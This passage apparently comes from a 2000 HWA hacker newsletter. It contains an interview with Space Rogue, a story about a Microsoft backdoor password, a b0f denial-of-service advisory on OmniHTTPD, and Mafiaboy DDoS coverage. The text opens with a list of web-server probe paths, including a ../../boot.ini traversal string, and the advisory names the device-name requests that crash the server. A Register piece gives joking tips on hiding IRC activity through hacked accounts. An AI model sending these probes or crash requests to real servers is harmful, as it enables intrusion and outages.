/default.asp /default.asp::$DATA /default.asp. /xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx /samples/ /photoads/cgi-bin/env.cgi /photoads/cgi-bin/ /photoads/ /session/admnlogin /session/adminlogin?RCpage=/sysadmin/index.stm /cfappman/index.cfm /samples/search/queryhit.htm /msadc/msadcs.dll /publisher/|publisher /PSUser/PSCOErrPage.htm ../../boot.ini ../.. /aux /status /log @HWA 06.0 Project Gamma interviews SpaceRogue of HNN ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Space Rogue Date Published: March 12, 2000 Date Conducted: March 11, 2000 Interview Conducted By: WHiTe VaMPiRe Interview Conducted With: Space Rogue Space Rogue is the editor of the Hacker News Network, a member of L0pht Heavy Industries (Now @Stake) -- he also previously maintained the Whacked Mac Archives, one of the largest Macintosh hacking-related sites on the Internet. Questions are colored and Space Rogue's answers are indented. How did you first get involved with computing? A door to door Osborne Salesperson came to my house. Showed us an Osborne One. While our family could not afford it $2,000+ that is where I started. I convinced him to come back several times on the premise of maybe we will buy it. In those few hours I learned a lot. What would you consider your first computer? Commodore 64. What projects were you involved with before the L0pht? Nothing anyone would know about. How did you get involved with the L0pht? I knew most of the other founders for years via local bulletin board systems. What are your feelings on the merger of the L0pht and @Stake? A good thing in general, it allows time and resources to be devoted to important projects that would never have been possible before. What initially brought you to create the Hacker News Network? I was sharing URLs with a small group of people and decided that it would be better to put them on the web and share them with a larger audiance. Many have noticed that after the L0pht / @Stake merger the commercial content was removed from HNN. How else will the merger effect HNN? @Stake is commited to vendor neutrality which is why all advertisements where removed. You will also notice the removal of the HNN Store and no more T-shirt sales. In the future you can expect even more changes including even the name of the site as it gets integrated into the @Stake corporate web presence. What do you have planned for HNN's future? HNN's future is pretty much out of my hands at the moment. Do you have any comments on the medias interpretation of "hackers," "crackers," and the related communities? This is an ongoing battle sometimes I think we are winning, and other times I think we have failed miserably. There are some journalists out there who actually 'get it' but many many others need to be educated. Do you think the media has at all improved with its coverage of 'hacking' related topics in the past few years? Well they have given it more coverage, not sure if that qualifies as an improvement though. This is especially evident during fast moving critical stories such as the recent DDoS attacks. Some news outlets got it right but many more got it wrong. How do you think they could improve their coverage and cut down the FUD (Fear, Uncertainty, and Doubt)? Education. Unfortunately many reporters have little to no understanding of technology. Why was the name of Project BootyCall changed to TBA? No comment. What is your opinion on Web site defacements? Most are childish and serve no purpose. You would think that people who are taking such an immense risk of going to jail would have something better to say that 'Props to my peeps.' The Hacker News Network is accessible at http://www.hackernews.com/. Space Rogue can be contacted via spacerog@l0pht.com. @HWA 07.0 MS Engineers plant secret anti-Netscape password ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Contributed by MerXor MS admits planting secret password Microsoft engineers placed a password in server software that could be used to gain illicit access to hundreds of thousands of Internet sites worldwide. By Ted Bridis, WSJ Interactive Edition April 14, 2000 4:34 AM PT Microsoft Corp. acknowledged Thursday that its engineers included in some of its Internet software a secret password -- a phrase deriding their rivals at Netscape as "weenies" -- that could be used to gain illicit access to hundreds of thousands of Internet sites worldwide. The manager of Microsoft's security-response center, Steve Lipner, acknowledged the online-security risk in an interview Thursday and described such a backdoor password as "absolutely against our policy" and a firing offense for the as-yet-unidentified employees. The company planned to warn customers as soon as possible with an e-mail bulletin and an advisory published on its corporate Web site. Microsoft (Nasdaq: MSFT) urged customers to delete the computer file--called "dvwssr.dll"--containing the offending code. The file is installed on the company's Internet-server software with Frontpage 98 extensions. While there are no reports that the alleged security flaw has been exploited, the affected software is believed to be used by many Web sites. By using the so-called back door, a hacker may be able to gain access to key Web-site management files, which could in turn provide a road map to such things as customer credit-card numbers, said security experts who discovered the password. Two security experts discovered the rogue computer code -- part of which was the denigrating comment "Netscape engineers are weenies!" -- buried within the 3-year-old piece of software. It was apparently written by a Microsoft employee near the peak of the hard-fought wars between Netscape Communications Corp. and Microsoft over their versions of Internet-browser software. Netscape later was acquired by America Online Inc. One of the experts who helped identify the file is a professional security consultant known widely among the Internet underground as "Rain Forest Puppy." Despite his unusual moniker, he is highly regarded by experts and helped publicize a serious flaw in Microsoft's Internet-server software last summer that put hundreds of high-profile Web sites at risk of intrusion. Almost every Web-hosting provider Russ Cooper, who runs the popular NT Bugtraq discussion forum on the Internet, estimated that the problem threatened "almost every Web-hosting provider." "It's a serious flaw," Cooper said. "Chances are, you're going to find some major sites that still have it enabled." Lipner of Microsoft said the company will warn the nation's largest Web-site providers directly. In an e-mail to Microsoft earlier Thursday, Rain Forest Puppy complained that the affected code threatened to "improve a hacker's experience." Experts said the risk was greatest at commercial Internet-hosting providers, which maintain hundreds or thousands of separate Web sites for different organizations. Lipner said the problem doesn't affect Internet servers running Windows 2000 or the latest version of its server extensions included in Frontpage 2000. The digital gaffe initially was discovered by a Europe-based employee of ClientLogic Corp. (www.clientlogic.com) of Nashville, Tenn., which sells e-commerce technology. The company declined to comment because of its coming stock sale. The other expert, Rain Forest Puppy, said he was tipped off to the code by a ClientLogic employee. When asked about the hidden insult Thursday, Jon Mittelhauser, one of Netscape's original engineers, called it "classic engineer rivalry." @HWA 08.0 b0f:Omni HTTPD Pro v2.06 for Win9x and NT DoS ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Main site/home page is http://b0f.freeBSD.lublin.pl/ and is run by Venglin of b0f. (NOTE: www.b0f.com, is the old site and that site may be phased out in the future.- Ed) -=- _____________________________________________________________________ b u f f e r 0 v e r f l 0 w s e c u r i t y a d v i s o r y # 3 Advisory Name: Omni HTTPD Pro v2.06 for Win9x and NT DoS Date: 12/4/00 Application: Omni HTTPD Pro v2.06 (probably others?) Vendor: Omnicron Tehnologies Corporation WWW: http://www.omnicron.ab.ca Severity: Any user can simply crush remote server with installed OmniHTTP daemon Author: sirius ( sirius@linuxfan.com ) Homepage: www.b0f.com * Overview Quote from Omnicron Technologies Web site: "OmniHTTPd is a powerful all-purpose industry compliant web server built specifically for the Windows 95/98/NT4 platform. In addition to Standard CGI support, the server sports advanced features such as Keep-Alive connections, table auto-indexing and server-side includes. For maximum performance, OmniHTTPd is both 32-bit and multi-threaded. Many users agree that OmniHTTPd is the fastest and most compact web server available for the Windows platform ..." * The Problem It is possible to crash OmniHttpD Pro. v2.06 (maybe other versions) because it parse the path strings to call some FAT32/VFAT routines in the kernel which makes your system unstable and useless until next reboot. If you request following directories: /com1,/com2,/com3,/aux,/lpt1,/lpt2,/clock$,/config$,/nul (and maybe others but not /con) the web server accepts the connection. e.g. if you request /com3 directory on remote server and if it has a modem device installed on com. port 3 it will crash connection of remote server and you will have to reboot the machine. If you have installed device on com. ports and if the remote user request directory which name matches the name of one device driver (e.g. /aux) it will crash that device ... if you succeed you will get error 403 : forbidden error. * Vulnerable Versions - OmniHttpd version 2.06 Pro under Win98, NT not tested - maybe other earlier versions * Fix Unknown for now, I mailed Omnicron Technologies ... they will probably fix this bug in next version. * Additional informations: Well, i played with this thing and went to SecurityFocus.com to check for this bug and I found securax security advisory 01 with some general informations about this bug so if you need more informations read that advisory at: http://www.securityfocus.com/templates/archive.pike?list=1&date=2000-03-1& thread=4.2.0.58.20000306111151.00992c60@urc1.cc.kuleuven.ac.be copyright © 1999-2000 sirius , buffer0verfl0w security www.b0f.com @HWA 09.0 Judge bans Mitnick from taking part in tech conference ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://deseretnews.com/dn/view/0,1249,160008642,00.html? Federal judge bans convicted hacker from taking part in tech conference A federal judge Monday banned convicted computer hacker Kevin Mitnick from taking part in a technology conference in Salt Lake City Wednesday. Mitnick, who gained notoriety for his hacking exploits and spent several years in a federal prison in Lompac, Calif., won't be sitting on a computer security panel discussion at the Utah Information Technologies Association conference at the Salt Palace Convention Center. The judge kiboshed the appearance because Mitnick's prison release agreement prohibits him from "consulting or advising" on the topic of computer-related activity. Monday, Mitnick did an extended interview promoting the panel discussion on KSL's Doug Wright Show, where he answered callers' questions about computer security and told the story of his hacking exploits. He hacked for fun, he said, and never made any money from it. Richard Nelson, president of UITA, said Mitnick's public relations representative had indicated that Mitnick had permission to appear from the U.S. probation office in California. A few days ago, the organization learned he might not be able to leave California. Conference organizers are in the process of arranging a replacement for Mitnick on the cyber-security panel. They are planning on bringing in a senior staffer from a large company that deals with cyber security. Nelson said he's sorry Mitnick can't participate. "He's eager to talk and disappointed he can't come. If you listened (to him on the radio show), he recognizes he made serious mistakes and he wanted to go forward. "We're not trying to promote his career, but if he can help information technology companies in Utah and decision makers dealing with security issues determine what level of risk they want to take, that's good. There will always be risk, but you can reduce it by taking security measures." The UITA conference, "Net Trends 2000: The Digital Revolution" takes place Wednesday and Thursday. @HWA 10.0 The continuing saga of MAFIABOY king lemur of DDoS ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.usatoday.com/usatonline/20000421/2187297s.htm Hacker's friends may be suspects in cyberattacks By Kevin Johnson USA TODAY WASHINGTON -- Authorities investigating the February attacks on some of the most popular Internet sites are focusing on three close friends of the 15-year-old Canadian boy who was charged earlier this week, a senior U.S. law enforcement official said Thursday. The three friends of the Montreal computer hacker known as ''Mafiaboy'' are among several potential suspects identified by authorities in the cyberassaults that temporarily shut down the Web sites of CNN, Yahoo, Amazon.com and several other media and commercial giants. Beyond Montreal, authorities are examining the activities of a small group of hackers thought to be based in Israel. Officials there say the group has been involved in various online financial crimes, some involving stolen credit card numbers. The group is believed to be part of a larger circle of computer users, including Mafiaboy, who have spent time in an Internet chat room called TNT. The chat room is accessible only by password. Investigators also are trying to determine whether Dennis Moran, a 17-year-old New Hampshire hacker known online as ''Coolio,'' was involved in the attacks in February. Moran, who authorities say has boasted of being involved in the attacks, was charged last month in an attack on a Web site run by the Los Angeles Police Department. The unidentified Montreal teenager known as Mafiaboy has been charged only in two attacks against CNN.com, which was shut down for 3 1/2 hours Feb. 8 after it was overloaded with requests. Mafiaboy claimed credit in chat rooms for similar assaults on sites run by Yahoo and Buy.com. Officials believe Mafiaboy may have been capable of directing all the assaults but doubt that he did. Analysts familiar with the assaults say the software used to wall off access to the CNN Web site on Feb. 8 was different and less sophisticated than that used to paralyze Yahoo on Feb. 7. Michael Lyle, who runs a software security firm in Palo Alto, Calif., said the attack on CNN involved software commonly found on Internet sites for hackers. ''I literally could show you how to do it in three or four hours,'' he said. The goal is to flood Internet sites with tens of thousands of requests, disguising the source of the assault by routing the requests through high-capacity computers elsewhere. The tactic overloads the targeted Web sites, causing electronic paralysis. Investigators say Mafiaboy orchestrated the attack on CNN.com through computers at the University of California-Santa Barbara. A Canadian law enforcement official said that because of Mafiaboy's age, it is unlikely he would be sent to an adult prison if convicted of ''mischief to data.'' If prosecuted and convicted as an adult, the teenager could face up to 20 years in prison. But in Canada's juvenile system, he faces a maximum of two years in a youth detention center if convicted. @HWA 10.1 Mafiaboy reaction: "yeah right" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.wired.com/news/print/0,1294,35785,00.html Mafiaboy Reaction: 'Yeah, Right' by Leander Kahney 2:20 p.m. Apr. 19, 2000 PDT The hacking community is skeptical that the Canadian Royal Mounted Police have nabbed the perpetrator of February’s highly publicized denial of service attacks. Following news that the Mounties charged a Montreal juvenile in the attacks, hackers are demanding evidence that the 15-year-old known by the alias "Mafiaboy" was indeed involved. "I’m highly skeptical," said B.K. DeLong, a member of Attrition.org, an Internet security group that monitors and archives website cracks and defacement. "I don't think they've found the person who did the attacks. I think law enforcement is stalling the press and public to keep them off their backs while they find the real person," DeLong said. DeLong said his skepticism was based on what appears to be a paucity of evidence linking "Mafiaboy" to the attacks. According to initial reports, the RCMP found computer logs and the transcript of an online chat group that led them to file the charges against the teen, whose real identity is shielded by Canadian law. DeLong said law enforcement had already blundered in the case with the arrest of Coolio, a.k.a. Dennis Moran, who was detained by New Hampshire police in March in relation to the attacks, but later was charged with the unrelated defacement of a Los Angeles Police Department anti-drug site. DeLong also noted that denial of service attacks are notoriously difficult to investigate and there has been a suspiciously long delay between the attacks and the charges. "I think they should show some definite evidence how they got this guy," said Scully, editor of Cipherwar, a technology and politics site. "Chat list logs are not enough." Scully said that law enforcement agencies have a poor record of finding and charging cyber-criminals, as evidenced by the four years notorious computer hacker Kevin Mitnick was incarcerated awaiting trial. This is the second time "Mafiaboy" has been linked to the attacks. Mafiaboy -– whoever that may be -- first was tabbed as a potential perpetrator of the attacks by an Internet security firm about a week after they occurred. Even then, hackers expressed their doubts Mafiaboy was involved. "I seriously doubt that this guy is an actual suspect," Space Rogue, editor of the Hackers News Network, told Wired News at the time. "Maybe he did it, but the information I have doesn't point to that at all." 10.2 Mafiaboy's dad gets busted for conspiracy to DDoS a business associate's head ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ I kid you not, I suppose his mum will be up on solicitation charges next... -Ed http://www.wired.com/news/print/0,1294,35836,00.html Like Mafia Son, Like Mafia Dad Wired News Report 10:45 a.m. Apr. 21, 2000 PDT Mafiaboy didn't fall far from the tree, it seems. Turns out the Canadian police tapped into some rather incriminating telephone calls placed by the 15-year-old cracker's dad, who allegedly took out a contract on a business colleague. See also: Hot On the Trail of 'Mafiaboy' Reno: 'We Must Punish Mafiaboy' Mafiaboy Reaction: 'Yeah, Right' Lieutenant Lenny Lechman said Mafiaboy's 45-year-old father was arrested last week and charged with conspiring to commit bodily harm. "We felt that before somebody gets hurt really badly, we had to intervene as quickly as possible," Lechman said. Mafiaboy was charged earlier this week with two counts of mischief for a Feb. 8 denial-of-service attack on CNN.com. He was fingered as a suspect back in February by Michael Lyle, chief technical officer of Internet-security firm Recourse Technologies Inc.. Mafiaboy's dad, whose real name is John Calce, was released on bail Monday. Mafiaboy himself has also been released, with a Kevin Mitnickian-like stipulation that he stay away from computers. Canadian police said they are still analyzing data found on the alleged cracker's seized computers. @HWA 10.3 On another mafiaboy note, a new site has popped up on Geocities ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.geocities.com/freemafiaboy/ gullible adj 1: easily deceived or tricked ; synonymous with Michael Lyle Michael Lyle is considered to be a computer security expert.... He is cofounder and Chief Technology Officer of Recourse Technologies in sunny Palo Alto California, which sells anti-hacker software programs. Also, he used to work for Exodus Communications whom experienced an embarrassing hacker break-in while he was employed there, and admits that he himself used to be a hacker. He goes by the nickname Icee on IRC. He told ABC he had communicated with Mafiaboy on IRC, and the 15-year-old said he had attacked not only CNN.com but also E+Trade. Their is now definitive proof that he was NOT talking with whom he believed was mafiaboy. Mafiaboy is a 15 year old Canadian. He was arrested on April 15 and charged with two counts of mischief to data for the attack that jammed up to 1,200 CNN-hosted Web sites for four hours Feb. 8. This website documents the extreme carelessness Michael Lyle showed in his "investigation" of the DDoS attacks that recently plagued CNN, Yahoo,Amazon, and E-trade. He is quoted in multiple news articles saying that he had conversations on IRC with "mafiaboy", who he claims admitted to the attacks on CNN and E-trade. The methods he used to accertain that this was the the real "mafiaboy" or if "mafiaboy" actually launched any of these attacks were extremely inefficient. This website contains concrete proof(from 2600.com) that on at least one occasion he was not talking to who he believed was mafiaboy. He later cited information from that same conversation in an interview with ABC. The General Public should not be constantly under these misconceptions the media is providing. Upon reading the IRC logs from 2600.com you will certainly question how gullible Michael Lyle is. Maybe he was just to focused on the fact of catching the perpetrator of these "hacker" crimes, so he could claim fame to himself and his company Recourse Technologies.... and get rich in the process. Is Mafiaboy real or a creation of the media? 04/20/00 This is the link to the IRC logs which show Michael's conversation with whom he believed was mafiaboy. Icee is Michael Lyle, while "[mafiaboy]" is someone from 2600 staff posing as him. This is an extremely hilarious conversation when you take into the fact that this is all a joke played on the "security expert" Michael Lyle. Below are various news stories I found online about mafiaboy. Probe of Hacker Nets a Second Suspect: His Father 04/21/2000 NEW INFO IN THIS ARTICLE The Challenge of Fighting Cybercrime ....04.20.00 Janet Reno licks chops over Mafiaboy arrest 04/20/2000 5:11pm Canadian Teen Charged in Web Blitz Thursday, April 20, 2000 Canada Arrests 'Mafiaboy' Hacker, Aged 15 Apr 19 2000 7:49PM ET Canadian Arrest Made in February Web Attacks 04/19/2000 10:10:00 ET Reno Says 'Mafiaboy' Hacker Must Face Punishment Apr 19 2000 11:04AM ET ‘Mafiaboy’ Suspected Feb. 16 This is pretty old.. but has some of the initial info. I have absolutely no idea whether or not mafiaboy is the same person as the Canadian teen arrested or if mafiaboy is even the individual responsible for the crimes. I have never conversed with anyone named mafiaboy and have no idea who he is. Comments can be e-mailed to Taelon@mail.com @HWA 10.4 Mafiaboy:Probe of Hacker Nets a Second Suspect: His Father ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.washingtonpost.com/wp-dyn/business/A53181-2000Apr20.html Probe of Hacker Nets a Second Suspect: His Father By Steven Pearlstein and David A. Vise Washington Post Staff Writers Friday , April 21, 2000 ; A01 ILE-BIZARD, Quebec -- There may be more to the computer moniker "Mafiaboy" than first believed. Montreal police said today that they moved in on the 15-year-old hacker last weekend after learning from wiretaps that his father had taken out a contract to harm or frighten a business associate and that the attack was imminent. They had wiretapped the boy's house shortly after U.S. and Canadian investigators identified that someone who lived there had launched a disabling computer attack that had shut down CNN's Web site and possibly other big sites in February. "We didn't think we could wait any longer," a Canadian police official said. Mafiaboy had bragged in online chats and to friends that he had taken down CNN.com, Amazon.com, Buy.com, eBay and E-Trade, but they didn't believe him. Federal law enforcement officials in Canada and the United States took note, however, following up on tips and tracing the electronic path that led to Mafiaboy's neighborhood in the West Island section of Montreal, sources familiar with the probe said. The wiretaps were intended to pick up evidence against the boy and leads about possible collaborators. Inadvertently, however, a police official said they also picked up phone conversations from the boy's 45-year-old father, president of a transportation company, as he conspired with a hit man about harming or scaring a business associate. Police moved in on both father and son at 3 a.m. Saturday at their home, charging the son with two counts of "mischief" with data and the father with two counts of conspiracy to cause bodily harm. The father, John Calce, was released Monday on $2,000 (U.S.) bail and ordered not to get within 300 yards of the house or office of the man he had allegedly targeted. The boy was also released from detention on the condition that he not associate with his three closest friends. Canadian law enforcement officials said yesterday they wanted to prevent Mafiaboy from using computers belonging to his friends and also did not want him to attempt to silence his friends, who could be witnesses against him in the case. The Royal Canadian Mounted Police, which is handling the investigation of Mafiaboy's computer hacking, indicated today it expects further charges will be brought against the boy once they have had a chance to review all of the evidence and the weeks of wiretaps on the house. U.S. and Canadian authorities also expect to charge others who may or may not have collaborated with the Montreal boy, whom police described as a somewhat amateurish hacker. There are no indications that the boy is cooperating with the investigation, and his attorney said yesterday that he intends to shift the focus from his client to the Web sites that should have better protected themselves against computer vandalism. "We can already foresee a long, complex and very technical trial which will certainly shed light on how a 15-year-old could have done what he is accused of, to a multinational corporation which almost certainly could have been expected to be equipped with the most sophisticated and up-to-date security systems," said lawyer Yan Romanowski. The Riverdale High School student with the Mafiaboy screen name struggled in classes and was transferred to Riverdale this year after being suspended repeatedly from another school closer to his home, classmates and law enforcement officials confirmed today. They said he excelled in one course: computers. Known as a computer whiz but a constant discipline problem--he had been suspended from Riverdale twice this year--he frequently talked back to his English and math teachers, banging his desk and rarely showing up for class with books and completed homework, according to friends and classmates who gathered for hot dogs today at La Belle Province, one block from the campus. The friends, all of whom declined to give their names, said Mafiaboy had been bragging about his hacking exploits for the past several weeks. "I didn't believe him," said one. "He was a bit of a showoff." "He had a real attitude," said another as he waited for the No. 205 bus after school. "He wanted to graduate someday, but he knew he had problems." Mafiaboy was described by his classmates as bright, engaging, outgoing and loyal to his friends. He hung out generally with the tough guys and was known to smoke cigarettes. In dress, he favors baggy pants, a loose-fitting yellow jacket and Nike T-shirts and shoes. "He likes to chill the girls after school," said one student having a cigarette at "The Pit," the unofficial smoking area just outside the school fence, at lunch time. Although he is said to have had one or two girlfriends over the years, he does not have one now, classmates said. The 5-foot-11 youth played guard in a Saturday afternoon basketball league on a team called the Brookwood Jazz. He may have more time to shoot hoops in the weeks ahead, since conditions of his release forbid him from using the Internet, entering a business with computers or going into a computer store. He is only allowed to use computers at school under the strict supervision of teachers and even then, is not allowed to access the Internet. Canadian police are examining the computers seized from the boy's house in the Saturday morning raid. Although he was in biology class yesterday when police announced details of his weekend arrest, he was reportedly not in school today, on the eve of a five-day Easter recess in Montreal-area schools. Riverdale is an ethnically and economically mixed high school in a largely English-speaking neighborhood, with about 1,200 students. More than half its students go on to community college or university. Students are required to wear uniforms. Mafiaboy lives about a 12-minute drive from the school in a new development of large brick and stone mini-mansions arrayed around the new St. Raphael Golf Course. Yesterday, a "for sale" sign was visible on the lawn of the family's sea-foam-green brick house, as it has been for four months. The asking price was recently reduced below $250,000 (U.S.). There is a paved basketball court on the side. A teenage boy who answered the door at the house late this afternoon simply handed the visitor a lawyer's business card. Neighbors out in their own yards told of a family that kept largely to itself. Mafiaboy's father is divorced, and the boy and his brother were living with the father and their stepmother. One neighbor said the father liked to sit out on the front stoop in his sweat suit and make loud telephone calls on his cellular telephone using noticeably crude language. U.S. and Canadian authorities have been monitoring the home where Mafiaboy lives for weeks but the authorities said they did not move to make arrests in the case until they were certain whose fingers were on the keyboard. Mafiaboy could be sentenced to a term of up to two years in juvenile detention for disrupting CNN's Web site, Canadian officials said yesterday, although they added that sentences for such crimes typically are stiffer in the United States than in Canada. "Young hackers, talking mostly now about 14- to 15-year-olds up to 22- or 23-year-olds, sometimes do not realize the damages they could make with their actions," said Yves Roussell, officer in charge of the Montreal commercial crime section of the RCMP. Roussell said U.S. and Canadian politicians need to do a better job of coordinating the legal penalties and sanctions for cross-border crimes, including computer hacking, and said additional resources are needed to fight hacking. He said the RCMP is studying the computers and data taken from the home. "There are literally tons of documentation and information to analyze and scrutinize and devise and from there we will pursue our criminal investigation," Roussell said. "We are still investigating the case." Vise reported from Washington. © 2000 The Washington Post Company @HWA 10.5 Mafiaboy:The Challenge of Fighting Cybercrime (Reno) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.cipherwar.com/news/00/reno_2.htm The Challenge of Fighting Cybercrime ....04.20.00 If you haven't heard, the Canadian police have arrested a 15 year-old boy in connection with the February DDoS attacks. Canadian law protects the suspect's privacy by prohibiting the release of Mafiaboy's true identity. This fact alone is a refreshing change from the American way of donig things. Arrest someone on the most pathetic evidence you can obtain, like chat room logs, and release their identity, ruin their lives, and then release them because there is not enough evidence. Janet Reno, among other inadequate criminal investigators, claims that the arrest proves that they can track down cybercriminals. Reno forgets that an individual is innocent until proven guilty, therefore they have not proven they can track down cybercriminals. And how long has it taken them to even find a 15 year-old boy to pin it on? Mafiaboy was arrested in Canada, and this is probably a good thing for him since the US Justice Department would probably have hung him out to dry as the big bad hacker, that he is probably not. Just to show how ridiculous Janet Reno is, below is an exerpt, uncut, of an address by Reno in February shortly after the DDoS attacks. The entire "statement" can be found here: http://www.cybercrime.gov/ag0216.htm. The Challenge of Fighting Cybercrime The recent attacks highlight some of the challenges we face in combating cybercrime. The challenges come in many forms: technical problems in tracing criminals operating online; resource issues facing federal, state, and local law enforcement in being able to undertake online criminal investigations and obtain evidence stored in computers; and legal deficiencies caused by changes in technology. I will discuss each of these briefly. As a technical matter, the attacks like the ones we saw last week are easy to carry out and hard to solve. The tools available to launch such attacks are widely available. In addition, too many companies pay inadequate attention to security issues, and are therefore vulnerable to be infiltrated and used as launching pads for this kind of destructive programs. Once the attacks are carried out, it is hard to trace the criminal activity to its source. Criminals can use a variety of methods to hide their tracks, allowing them to operate anonymously or through masked identities. This makes it difficult – and sometimes impossible – to hold the perpetrator criminally accountable. Even if criminals do not hide identities online, we still might be unable to find them. The design of the Internet and practices relating to retention of information means that it is often difficult to obtain traffic data critical to an investigation. Without information showing which computer was logged onto a network at a particular point in time, the opportunity to determine who was responsible may be lost. There are other technical challenges, as well, that we must consider. The Internet is a global medium that does not recognize physical and jurisdictional boundaries. A hacker – armed with no more than a computer and modem – can access computers anywhere around the globe. They need no passports and pass no checkpoints as they commit their crimes. While we are working with our counterparts in other countries to develop an international response, we must recognize that not all countries are as concerned about computer threats as we are. Indeed, some countries have weak laws, or no laws, against computer crimes, creating a major obstacle to solving and to prosecuting computer crimes. I am quite concerned that one or more nations will become "safe havens" for cybercriminals. Resource issues are also critical. We must ensure that law enforcement has an adequate number of prosecutors and agents – assigned to the FBI, to the Department of Justice, to other federal agencies, and to state and local law enforcement – trained in the necessary skills and properly equipped to effectively fight cybercrime, whether it is hacking, fraud, child porn, or other forms. Finally, legal issues are critical. We are finding that both our substantive laws and procedural tools are not always adequate to keep pace with the rapid changes in technology. Are We Supposed To Feel Symapthy For Her? @HWA 10.6 Mafiaboy:Janet Reno licks chops over Mafiaboy arrest ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Posted 20/04/2000 5:11pm by Thomas C. Greene in Washington Janet Reno licks chops over Mafiaboy arrest US Attorney General Janet Reno glowed with pleasure during a Wednesday press conference as she wagged her finger and called for the Canadian courts to punish Mafiaboy for causing DDoS mayhem on the Web back in February. "I think that it's important first of all that we look at what we've seen and let young people know that they are not going to be able to get away with something like this scot-free," Reno told reporters, as if Mafiaboy had already been tried and convicted. "There has got to be a remedy, there has got to be a penalty." Reno did stop just shy of telling the Canadian courts precisely what the penalty ought to be. But if Mafiaboy should be convicted, his punishment will undoubtedly be a good deal lighter than anything a malicious hacker might get in the USA, which, it was revealed today, has achieved the distinction of maintining the world's largest polulation of citizens locked up in cages. Reno also took the opportunity to boast about the profound technical savvy of her troops in the field. "I believe this recent breakthrough demonstrates our capacity to track down those who would abuse this remarkable new technology, and track them down wherever they may be," Reno said. Yeah, right. The Register recalls the very brief period of DoJ tirumphalism over Coolio's arrest and how quickly it evaporated, and thinks that this 'recent breakthrough' demonstrates nothing so much as the Feds' desperate need to pounce on any scapegoat they can find in hopes of concealing how hopeless they are in tracking cyber-criminals. The hacking underground remains wisely reluctant to believe that Mafiaboy is more than a scapegoat, at least until evidence is produced. The scene has been abuzz with sceptics, while the mainstream press, predictably, appears satisfied that the Mounties have got their boy. Meanwhile, 2600.com has posted a bogus IRC log between a staffer posing as Mafiaboy and one 'Icee' who the magazine claims is the person responsible for tipping the Feds to Mafiaboy's alleged DDoS attacks. We're not entirely sure what the point of this stunt is, except perhaps to demonstrate that anyone can pretend to be anyone else in IRC in hopes of casting doubt on the authenticity of the Mafiaboy logs which are expected to be produced in evidence against him at trial. Nice try, but of course the Feds can obtain both IRC and ISP logs, so it's not terribly hard for them to divine the true origins of IRC traffic. You can go on line as 'Icee' and fool, say, the editors of 2600; but if the Feds can persuade a judge to issue a trap and trace order, they will get all the evidence needed to pin the logs on the dummy....and probably figure out how to piece it together, or at least hire someone with a brain to do it for them. (Note to wannabe leet h4x0rz: IRC traffic is logged, Einstein, so always connect through a hacked ISP account or a freebie such as NetZero where you can register with fictional information; and always dial in from a phreaked telephone account [preferably in Tonga or Madagascar]. If you can't manage that much, then don't say anything in IRC that you wouldn't announce over a bull horn in the lobby of FBI Headquarters.) Speaking in conclusion, again as if Mafiaboy had been tried and convicted, Reno lectured the populace on morality. "We have got to renew our efforts to teach young people -- children -- cyber-ethics," she said. Renew them? We were blissfully unaware that any such efforts had been made in the first place. ® @HWA 10.7 Mafiaboy:IS MAFIABOY REAL OR A CREATION OF THE MEDIA? ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ IS MAFIABOY REAL OR A CREATION OF THE MEDIA? 04/20/00 We'd like to officially express our skepticism on the recent arrest of a Montreal teenager for the Denial of Service attacks back in February. Naturally, we always have reason to be somewhat doubtful whenever the authorities claim to know the first thing about the Internet. But in this case, we wanted to see just how clueless they could possibly be. When the name "mafiaboy" was first mentioned months ago, a couple of us hopped onto IRC using that nick. Sure enough, within seconds, we were being messaged by people who believed we were the person responsible. Amazingly, the person who fell for it the hardest is the very person now being quoted widely in the media as having caught the perpetrator. Now perhaps this is all just a big coincidence. But as you can see from the IRC logs below, we dropped a few clues that the person was in a country with snow and at one point "accidentally" spoke French to imply the province of Quebec. We were amazed when the blame actually landed on someone from Montreal. A good question to ask is why we would want to cause such confusion and mayhem. The answer is to prove a point. That all one needs to do to be considered a suspect is change a nickname on IRC. We had absolutely NO proof that we could provide to make this fictitious person responsible in any way for the attacks. Yet we were believed by countless people, including the "expert" who is taking credit for the arrest. And now we see that the main piece of evidence against the real person who was arrested is the fact that he was "bragging" in an IRC channel. Please. If this is indeed the person responsible (and what a geographical coincidence THAT would be), we'd like to see them held accountable to a REASONABLE degree. But in order to do this fairly, the evidence must be made public. Otherwise, we will continue to believe that the authorities and the media are more interested in sending a message than actually achieving justice. ----------------------------------------------------------------------------- [We begin the log after a brief conversation explaining why and how we are on IRC from a different address.] READ THE LOGS CAREFULLY ALL MAY NOT BE AS IT SEEMS, IE:NO SPEED READING :-) ----------------------------------------------------------------------------- *icee* is the "security expert" who first pointed the finger at someone named mafiaboy, based solely on conversations he had on IRC. *** [mafiaboy] is 2600 staff posing as someone on IRC named mafiaboy, shortly after his name was first reported in the news. (Uh yeah ok ... does 2600 staff do this sort of thing often? hrm ... - Ed) February 10, 2000 